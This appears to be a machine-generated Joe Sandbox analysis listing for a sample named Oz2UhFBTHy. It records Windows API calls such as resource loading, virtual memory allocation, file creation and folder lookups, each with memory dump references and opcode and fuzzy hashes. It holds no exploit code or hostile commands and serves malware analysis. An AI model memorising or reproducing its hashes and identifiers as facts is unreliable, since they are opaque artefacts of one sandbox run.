                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                                      • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 4097029671-0
                                                                                                      • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                      • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                                      • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                      • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                      • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$CurrentEnumWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2396873506-0
                                                                                                      • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                      • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                                      • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                      • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                                      APIs
                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastMove
                                                                                                      • String ID:
                                                                                                      • API String ID: 55378915-0
                                                                                                      • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                      • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                                      • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                      • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1375471231-0
                                                                                                      • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                      • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                                      • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                      • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                                      APIs
                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                                      • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CursorLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 3238433803-0
                                                                                                      • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                      • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                                      • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                      • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2987862817-0
                                                                                                      • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                      • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                                      • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                      • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                                      APIs
                                                                                                      • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                                      • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FolderFreeKnownPathTask
                                                                                                      • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                      • API String ID: 969438705-544719455
                                                                                                      • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                      • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                                      • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                      • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                                        • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                      • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                                      • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                      • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocLock
                                                                                                      • String ID:
                                                                                                      • API String ID: 15508794-0
                                                                                                      • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                                      • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                                                                      • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                                      • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 2087232378-0
                                                                                                      • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                      • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                                      • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                      • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                                        • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                                        • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1658689577-0
                                                                                                      • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                      • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                                      • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                      • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                                      APIs
                                                                                                      • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoScroll
                                                                                                      • String ID:
                                                                                                      • API String ID: 629608716-0
                                                                                                      • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                      • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                                      • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                                      • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                        • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                      • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                                        • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                                        • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3319771486-0
                                                                                                      • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                      • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                                      • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                                      • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                      • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                                      • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                      • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                                      APIs
                                                                                                      • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                      • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                                      • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                      • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                      • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                                      • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                      • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                      • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                      • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                                      • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                      APIs
